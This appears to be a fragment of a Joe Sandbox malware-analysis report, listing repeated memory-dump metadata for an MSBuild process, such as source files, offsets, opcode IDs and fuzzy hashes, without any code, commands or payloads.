                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: eae184f236d6663f166d0e830c824ba3acdc63904638de59ccf7ccb8fa0dfae2
                                                                                                                                                                                                                                                                  • Instruction ID: 4fe1ff50778dfd587f6ec312ec25a05f243f9d056c02a69830c0d3310aabb332
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eae184f236d6663f166d0e830c824ba3acdc63904638de59ccf7ccb8fa0dfae2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8511831A0471AEFEB15EF68C848BBDBBF6FF54719F204069D51293A90DB709901CB80
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 867c60e674058cd01d284342b43c6619f92e8bf8f17947e4221ae57e5c7abd94
                                                                                                                                                                                                                                                                  • Instruction ID: e246f352bda1647ffd6a837dec3bb5f8526143d530193a4b93abbb5cc345cb7f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 867c60e674058cd01d284342b43c6619f92e8bf8f17947e4221ae57e5c7abd94
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7512A71200A49DFDB22EF6DC9C0FAAB3B9FF14748F41046AE65697A60E734E944CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                                                                                                  • Instruction ID: ce2bc78cb6343bc8ce499f0b5dd3612341df8644af883e00600a0df2a7d1f0d1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A51DC35E0021AABDF16DF98C440BEEBBB9EF45358F48406AEA10BB240D775DD40CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9aed6f037a15e4d75bdc7b5d8d061bb0e6c97841380c2e310e2e809d5833f3bd
                                                                                                                                                                                                                                                                  • Instruction ID: ec345994fc71d231126e2a90cdbfce9805ee2279d6e1a8e7c77548c83e04f2fd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9aed6f037a15e4d75bdc7b5d8d061bb0e6c97841380c2e310e2e809d5833f3bd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02518B32E4051D4BEF25CE68D461BEFB7F2EB44324F440826E905BF3D1C6766946D650
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1575aaff218bcaed33d8da6f9fcd8a5e3e97b15b609816821912703dd4720616
                                                                                                                                                                                                                                                                  • Instruction ID: 6e8ab10bd2179bb27e8a137e865a023ec7bc8bde2366a39298c27e559c33ab33
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1575aaff218bcaed33d8da6f9fcd8a5e3e97b15b609816821912703dd4720616
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C51DF74A00216ABDB14DFECC488ABEBBB5FF45708F04416DEA45DB790E7349950CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                                                                                                                                                                                  • Instruction ID: e0bf28abec2c1f3d0a93ab7a535c1e0153c1796ec168c49176f21e9b9898aa32
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37517D71A083429FE311CF68C884B5BBBE5FBE8254F04892EF99497391D734E905CB52
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8e83632dc7b4ad1fec0831177fb78c75dcebabf39e1326dd4e731ce43d9c4315
                                                                                                                                                                                                                                                                  • Instruction ID: f7873c031bc1bb5320e3d10cab8192f8deb0981edbe642d2448926378515cd73
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e83632dc7b4ad1fec0831177fb78c75dcebabf39e1326dd4e731ce43d9c4315
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B551F731A0011A9BEB25DF6DD844A7FBBB6FF48356F14452AD905E7260DB70AD12CBC0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b90c9579018e507f66cc97c06df8a39a02b94efd9a9bdb412609f6b4d943e398
                                                                                                                                                                                                                                                                  • Instruction ID: 1c674241d7aca5f133b7ca4bf4de0c7f3b374c5b3905019eaee76ee9e66e6767
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b90c9579018e507f66cc97c06df8a39a02b94efd9a9bdb412609f6b4d943e398
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B412831B557069BCB27FBBF88025AEB6A1DF24614B11413FE802EF3B4DA7488014F91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                                                                                                                                                                  • Instruction ID: 3be7ea7c79ba94d1b1b43304d06fa9c45aed5f8b45ae953b86e856b22946b49d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28517271600606EFDB56CF18C580A96FBB5FF45348F15C1AAE9089F322E371E945CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 30769c5126fab766008213a08127290b9740d8bb593327ce93a898c51d6f2b25
                                                                                                                                                                                                                                                                  • Instruction ID: d6667eba990ff5222f80ad8043c01f54a6ea1b93ed7a146b8f29b816022b9d9d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30769c5126fab766008213a08127290b9740d8bb593327ce93a898c51d6f2b25
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6041D031901219DBDB18DF98C480AEFB7B5BF48718F14815AFA19FBA40E7349D45CBA4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 853a9788fa5b559db611005eeed7c3082ce832e94517c07d520ecd2821328421
                                                                                                                                                                                                                                                                  • Instruction ID: 2d0225bbc53b6ae2ca57686cfaea4eb0402010895dd837ae244845967b5af201
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 853a9788fa5b559db611005eeed7c3082ce832e94517c07d520ecd2821328421
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4051BC322047A5CFDB22DB5DC448B2A77E5BB44B68F0904AAF841CBAD1D734DC45CAA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 96b5013aa41eff8d358a590251421a9007ad6c4720aaa913d5bfb3af6d02d420
                                                                                                                                                                                                                                                                  • Instruction ID: 32cd9a84920eec8743e1534e7b3b8221115242d8acb138764a2431bd9147dc64
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96b5013aa41eff8d358a590251421a9007ad6c4720aaa913d5bfb3af6d02d420
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE51E5B0A0071ADBEB259B28CC05BE9BBB5EF1131CF1482E9E529A76D1D7749981CF40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d52a5ce94ea3c9f1f0b3dda90166cffffcc2f8fa2ab8a7cacca2709612bef385
                                                                                                                                                                                                                                                                  • Instruction ID: dc0a52d7b28535822f63fc55ebe9e669115429a7b39ac7f09161dd04180892c6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d52a5ce94ea3c9f1f0b3dda90166cffffcc2f8fa2ab8a7cacca2709612bef385
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E241CFB1641606EFDB22AF6DD880B6AFBF8EF5079CF004469E615DB660E774D800CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e5a73ab1a07dce526672faae845dbafcfd84bc99a2770d70fb65071dff654185
                                                                                                                                                                                                                                                                  • Instruction ID: 8f779c9a7f5390452d19f79153f2d71350bddab60cdae1a6988ed81db88d9294
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5a73ab1a07dce526672faae845dbafcfd84bc99a2770d70fb65071dff654185
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A41CD712083418FE714CF29D8A587BBBE1FBC4625F05895EF8958B392CB30D819CBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9209ecf04d8c7ec43c2b087bfa5eadf8ac6e3509f0784605b01c8df2c2038da0
                                                                                                                                                                                                                                                                  • Instruction ID: fb4d54b0b75b2002d0ec755befa1f42c730d99c7c6f0d56fc6baee2dd5bed6be
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9209ecf04d8c7ec43c2b087bfa5eadf8ac6e3509f0784605b01c8df2c2038da0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3131E571B00606EFEB229FADC850BABB7B9AF45754F15406FE509DB362DA30DC018B90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1f728f1acd20e38a0f55a313d7580fda8598def61d308428e0541767ce322e66
                                                                                                                                                                                                                                                                  • Instruction ID: 5db573cb7163d0fd0d77d73130afc592522ce9113ce0667aa2aa9799b5211c00
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f728f1acd20e38a0f55a313d7580fda8598def61d308428e0541767ce322e66
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A31A9726093118FE320DF19C844B6BBBE9FF98708F5449AEE98497291D370EC04CBA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                                                                                                                                                                  • Instruction ID: 156996202a41defdce43fb2dd0edef8c3acfc7a0f1a02fc00fda910682a1aaa4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58315A76604206CFC710CF2CD480956FBF6FF99318B2586A9E9589B315E730ED06CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9dc4240cd6e30ab0c1beae4257ed654aaa807e120260a3c34ad19c10978c23b1
                                                                                                                                                                                                                                                                  • Instruction ID: 75e82d2f43b7783ecd27165529448045a674d985ada5c2453e871e73628ed4aa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dc4240cd6e30ab0c1beae4257ed654aaa807e120260a3c34ad19c10978c23b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3431E232B006059FDB25DFB8C981A6EBBFAEB80308F548429D145E3694D770DD41CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                                                                                                                                                                                  • Instruction ID: 85a0f17c1e53ea1a11e8e4278c92759aaae9c0e1548ab3e8ef84a4ccee241c14
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
